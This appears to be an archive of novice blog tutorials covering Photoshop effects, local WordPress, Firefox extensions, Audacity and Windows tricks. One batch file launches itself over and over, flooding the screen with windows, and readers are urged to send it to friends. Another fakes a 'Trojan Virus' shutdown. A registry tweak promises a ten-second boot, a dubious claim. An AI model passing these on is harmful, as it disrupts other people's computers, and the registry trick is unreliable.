The Final Output is going to be somewhat like this :

Lets Begin the tutorial..

1. Start By making a new Document in Photoshop with the following settings :

2. Fill the background using the "Paint Bucket Tool" with Black Colour.

3. Type a big text on it. I used the following settings :

4. Ctrl+ Click your Text layer at the "T" in the layer's pallete.

5. Press "D" on your Keyboard to set the colours to black and white. Now Create a new layer, Then go to FILTER >> RENDER >> CLOUDS .
Press Ctrl+F to reapply the filter. Also, hide the original text layer.

6.Press "Ctrl+D"on your keyboard to deselect the selection. Now go to FILTER >> SHARPEN >> UNSHARP MASK and apply the following settings.

7. Now go to FILTER >> STYLIZE >> WIND . And apply the following settings.

8. Now again repeat step 7 but this time, set the direction "From the Left". This is the output till now :

9. Now Again, "Ctrl+ Click" the original text layer (as mentioned in step 4) without making the layer visible. Now go to SELECT >> MODIFY >> CONTRACT. Enter pixels to contract by. In my case, it was 5 pixels.

10. Now go to SELECT >> FEATHER. Enter 3 pixels.( in my case it is 3, it may vary for you). Then go to SELECT >> INVERSE.

11. Now go to FILTER >> STYLIZE >> WIND and apply the following settings :

Again repeat this step but with the direction as " From the Left ".

12. Now go to FILTER >> DISTORT >> TWIRL and enter an angle around 500 or 600. It depends on your text and its size.

13. Now add some colours by going to IMAGE >> ADJUSTMENTS >> COLOUR BALANCE and fiddle with the colours there to get your required effect.

14. Also, you can show the original text layer and choose its "Blending Option" to "Exclusion".

Setting Up a Local Wordpress Blog

Ever wanted to set up your own blog on your computer??Now you can..
Before we get started, let me tell you what wordpress exactly is.

WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards, and usability. WordPress is both free and priceless at the same time.More simply, WordPress is what you use when you want to work with your blogging software, not fight it.

We will require the following things before we can begin the tutorial :
1. Latest Version of Wordpress
2. Xampp

After you get the above two things, continue below. I shall teach you everything in points.

1. After you download the files, put them in a folder and click on xampp's setup to install xampp.

2. Now extract the wordpress ZIP file onto your system.

3. Now go to C:\xampp\htdocs\ and delete all the three files in there.

4. Now, copy the wordpress files that you had extracted earlier to this htdocs folder.

5. Now, go to C:\xampp and double click on xampp-control to start the XAMPP CONTROL PANEL.

6. Now, start the following services in XAMPP CONTROL PANEL.

Note : If any of the services fail to start, click on the Port-check button on the right of the window and close the necessary applications, which have an conflict with XAMPP. Also, if any windows warning comes up saying Unblock or Block, you should choose Unblock in order for XAMPP to work.

7. Now go to C:\xampp\mysql\data and create a new folder called "LearnZone", without the braces/quotes.

Note : You can create any other name folder also, but then remember the name for further use. I shall be using this name only.

8. Finally, now we just need to do certain things in the browser. So now start your browser and enter the following url : http://localhost.

9. Click the "Create Config File" Button and then click the "Let's Go" Button on the next page.

10. Enter the following data in the respective fields and click Submit.

Note: In case you made a folder with other name in step 7, put that name in the "Database Name" field.

11. Now just click "Run the install" button and enter the respective details on the next page and hit the "Install Wordpress " button

12. Next you will see a screen with a username (admin) and a randomly generated password. Note that password very carefully because if you forget it, you can not use wordpress. Then, you will have to re-install wordpress. Anyways, click continue on that page and proceed.

13. Now enter the username as "admin" and that randomly generated password in the passowrd field and click the "Log In" button.

14. Now you have arrived at the dashboard and you will see a warning up, asking you to change your password to whatever you want to. Click the "Yes, Take me to my profile page" link.

15. Just enter a strong password in the password fields and press update. Now you can login with that password and the admin username.

16. You are done with the installation of a Wordpress Blog on your local machine.

Making Custom Design Folders in Windows

Ever wanted a custom designed folder for yourself but couldn't do that because of lack of knowledge or resources?? Now it is possible to do that. The final Outcome would be somewhat like this :

Okay, to start with, you may want to download the files I have used. Click here to download them.

Now, lets start with it...Follow these steps to get the best of it...

1. Open Notepad and Paste the following code in there.

You can replace "icon.ico" by your filename for the icon. Also, you can replace "background.jpg" by your file name. But note that the file format should be ico and jpg respectively.

2. Go to file menu and choose save as . Choose the 'Save As Type' as 'All Files'. Name the file as Desktop.ini and save it in the folder whose apperence you want to change.

3. Now copy and paste the background and icon file in the same folder as the one with the 'desktop.ini' file.

4. Select all the files ( background.jpg , icon.ico and the Desktop.ini files ) and right click and choose properties and check the box which says hidden.

5. Your folder is now ready. When you reboot your system, you will see the end result.

Backup Your Saved Passwords In Firefox

Firefox does a great job of of saving your usernames and passwords so you don't need to remember them next time you visit a Web site. While this feature is great, Firefox does not include a good backup method to save passwords and accounts in the event you need to restore or copy to a safe location.

You can backup your entire Firefox profile directory, but if you just want to keep a backup copy, or have a need to sync them with another Computer, the Firefox extension Password Exporter is all you need.

Password Exporter allows you to export and import your saved usernames and passwords between Computers or keep as a backup copy. Your passwords will be exported to an XML or CSV file and can be encrypted.

To install Password Exporter, click on Install Now follow the instructions, and restart Firefox after the installation has completed. When Firefox has restarted, you can access Password Exporter from Tools \ Options and select the Security Tab.

Look for the Import/Export Passwords button in the Passwords section:

To export, click on Import/Export Passwords button. In the Import/Export Passwords window, select Encrypt Usernames/Passwords check box (recommended as a safe guard) then click on Export Passwords.

To save the file, give it a name and select to either save it as a CSV or XML file.

Photoshop costs the earth, and quite honestly, makes sense only for those who really know how to use Photoshop. The rest of the so called "Garden -Photographers" have so far had to rely on the free software that came with our camera. But now, that's not the case.

There is a website called "Picnik" where you can edit your pictures online for free. Be the pictures be on Facebook, My Space etc. still you can edit them here.

Create a cool Shattered Glass effect with photoshop!!!

Hi there, this is another novice Photoshop tutorial. This tutorial will teach you the simplest method of creating the above text effect shown in the image. Its pretty simple, i saw this type of effect once in some site i really don’t remember some years ago, it was not totally same it is its modified version giving it a better, cool, shiny, web 2.0 look.

Let's start.
Step 1: Create a new document with the following dimensions.

Step 2: Give this document a black background colour and type a Bold text with white colour.I used the Impact font.

Step 3: Select the text layer from the layers palette and from the FX drop-down menu(see picture) choose Gradient-overlay.

Step 4: Apply the following settings and a rainbow colour gradient. If you want to make the gradient manually, just edit the current selected gradient and remove all stops except three. One in the left hand corner , one in the middle and the other one in the right hand corner. and apply the following colour to each of them.

Step 5: Duplicate the text layer by selecting it in the Layers palette and pressing Ctrl+J. After this, select the original text layer and press Ctrl+Shift+N to insert a new blank layer with black background. Merge this newly created layer and the Duplicated text layer(select both and press Ctrl+E).

Step 6: Select the newly merged layer and go to Filter --> Distort --> Glass. Apply the following settings and press OK.

Step 7: Select the layer named background and again press Ctrl+Shift+N to insert a new blank transeparent layer. Merge this newly created transparent layer with the text Layer. Finally, drag this newly merged layer on the top of all the layers.

Step 8: Apply Gaussian Blur(Filter --> Blur --> Gaussian Blur) of 3.5Px(Depending upon your image). Then, choose the blending layer mode to Screen.

Step 9: Finally, duplicate the Layer 2 and apply a motion blur of 38px to the duplicated layer. Then, set the blending mode to Color Burn.

In this Photoshop tutorial we are going to create a Fire Text Effect.
The final output is going to be like this :

Step 1: Let's start. Create a new document.

Step 2: Fill the background with black. Select the type tool and create a white text.

Step 3: Go to Filter> Blur> Gaussian Blur and when it asks to rasterize,choose yes.Then apply these following setting :

Step 4: Now create the flames, select the smudge tool and choose 17PX soft brush by right clicking anywhere on the image.

Open the Brush panel and use these following setting:

The output till now, would look like this :

Step 5: Click on the Adjustment Layer button at the bottom of the layers pallet and select Color Balance.

Set the following Midtones, Shadows and Highlights Settings:

Step 6:Now, create a new text layer on top of that fire layer using exact same font and size as you did in the first step, but this time, use black for the color. Place this text layer on top of the fire layer.

Step 7: In the final setup, select the new text layer and go to blending options and choose 'Overlay'.

If you like to have your entire computing experience within your FireFox window, you might be interested in accessing your POP email accounts directly in FireFox. The Simple Mail extension gives you this functionality, and true to the name it’s very simple.

Get the extension by clicking here and restart FireFox after that then continue ahead.

1. After installation, you should notice the little mail icon in the status bar, right-click it and open the preferences to add your new account.

2. Click on add to add a new account.

3. Enter the account name, your email address and the reply address ( if its different) and edit any other setting you may want to.

4.Then click on the POP3/IMAP tab and choose POP3. Add the relevant details provided by your email provider including your user name and password.

5. Now go to the SMTP tab and again add the relevant details including user name and password.

6. That's it. You have successfully configured your POP3 mail account to use with Simple mail extension in FireFox.

Additional Help :
Composing a new mail : To create a new mail click where the arrow is shown in image and you will be taken to the window where you can type the mail and the email address of the receiver.

Checking Mail : To check your mail, click where the arrow points.

Extract Vocals ::::: Using Audacity

Ever heard a song and wanted to extract the vocals only from that song? Here is a simple yet effective way to do the same.

For this tutorial, you will need Audacity, which is an open-source software.

Okay, lets begin.

1. Open Audacity and go to File Menu -->Open .

2. Browse your file and Select Open.

3. It will then import the file into Audacity.

4. Now from the Drop-down menu, next to the title(see image) and choose "Split Stereo Track".

5. Now you will have two tracks there. Next, choose Mono from the same drop down menu for BOTH the tracks. Remember BOTH the tracks.

6. Now go to Effect Menu --> Invert.

7. It will invert the Audio.

8. You are done, just play the file by clicking the play button on the top and see for yourself.

Okay, many of you would know this but still I'm posting this.

This is a simple Command Prompt trick. After you open this file, it would multiply its window to some extent, opening many many windows and its really Annoying..... Believe me... Try it on your PC only when you are ready to shutdown the PC.

Okay, so lets begin...

1. Open Notepad( Go to Start Menu --> Run -->notepad and press enter.)
2. Paste the following code into the file and save it as lol.bat

@echo off :laugh: :laugh:
start lol.bat

Just remember one thing that you have to save as lol.bat ....

That's it and its done...

Send it to your friends or any other person and they are gonna get annoyed.........

I use many different shortcut keys in my daily routine on my PC.

I will be posting all of them here so that everyone can come to know.

The following is the list of Command Prompt commands and the different functions that the command performs.

ANSI.SYS : Defines functions that change display graphics, control cursor movement, and reassign keys.
APPEND : Causes MS-DOS to look in other directories when editing a file or running a command.
ARP : Displays, adds, and removes arp information from network devices.

Start PC in just 10 seconds!!!

My computer takes a lot of time to load. So, I searched the internet to find this trick that starts the computer in just 10 seconds...

I could not believe it at that moment. Then i tried it on my PC and it actually worked so i thought i should share it with everyone who faces this problem.

So lets begin.

1. Go to Start Menu --> Run and type regedit and press Enter. This will open Registry Editor.

2. Now browse for the following key:

HKEY_LOACAL_MECHINE -->SYSTEM -->CurrentControlSet -->Control -->ContentIndex

3. Now scroll down and look for the key named "Startup Delay".

Please make sure that you backup your Registries. Go to File --> Export in the Registry Editor. This is just incase anything goes wrong with you.

4. Double Click on it.

5. Now, choose decimal from the two radio buttons under the heading "Base".The default value you will see there will be 480000.

6. Change the value to 40000.

7. That's it. You are done with it.Close the Registry Editor and restart your computer.

Remove the Autorun virus from your MP3 Player/ Flash Drive

I used to get a lot of Autorun viruses into my USB Flash Drive. So i searched the Internet and found a permanent way to get rid of them from my USB Flash Drive.

Okay, so i will tell you what to do now.

1. As soon as you connect the flash drive to the PC, Go to My Computer and then right click on the flash drive and choose format.

2. After formatting, right click on the drive and choose Explore.

Note: When you explore a USB Drive, it stops the virus, if any from acting.So make it a habit to do that. :)

3. Now create a new folder in the Flash Drive and name it "Autorun.inf"(without the braces). When you create this folder, it prevents the virus from copying itself to your Flash Drive.

Shutdown PC with a BAT file

I just came across this little trick while browsing the internet using which we can shutdown the computer by just running this file.

Okay, so lets begin with it.

1. Open Notepad(Go to Run, type notepad and then hit enter)

2. Paste the following code in the file :

shutdown -t 60 -c "Trojan Virus By Learn Zone" -s

3. Go to File -->Save As --> name it "shutdown.bat"(without the quotes).

4. Hit Enter and then run the file from where you saved it.

Note: You can change the time and the message it gives when clicked. To change the time, replace '60' in the code with the required time(in sec) and 'Trojan Virus by Learn Zone' to the appropriate message that you want to show. Do not remove the quotes (") before and after the message.

A Rare Google Images Trick

This Trick makes all the images on the Google image search page to dance like anything.

1. Go to http://images.google.com

2. Search for any image you like. I searched for Bikes.

3. Then delete the url in the address bar. Like in this case, it would be something like this :

http://images.google.com/images?hl=en&q=bikes&btnG=Search+Images&gbv=2&aq=f&oq=bike

4. Paste any one of the three scripts instead of the url to see amazing effects:

Chat With Friends Using Command Prompt

Ever wondered if your could chat with your friends using the command prompt window? Now it is possible to do this. All you need is the other person's IP Address.

1. To know your friend's IP Address, ask your friend to open http://www.whatsmyip.org and tell you the IP Address he sees there.

2. Open Notepad and paste the following code into it as it is:

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3. Choose Save and choose all files from the drop down menu and name the file as "messenger.bat"(without the quotes).

4.Now Open Command Prompt by going to Start Menu --> Run --> Type "cmd"(without quotes) --> Hit Enter

5. Drag the "messenger.bat" file onto the command prompt screen and then hit enter.

6. That's it. Enter your friends IP Address and then press enter. Then enter the message for him.

Blogger Hack: Add Digg button on Blogger Template next to title

Okay, so now lets begin with adding a Digg button on your blogger template. The output will be just like the Digg button i have on my blog, next to the title of the blog.

First, open blogger and go to HTML editing. Tick-mark the button that says Expand Widget templates.

Please backup your template before making any changes in the template. Click on Download Full Template on the EDIT HTML page.

Search for the following code in your template:

...<data:post.body/>...

And add the following code just before this : <data:post.body/> line

That's it, you are done.
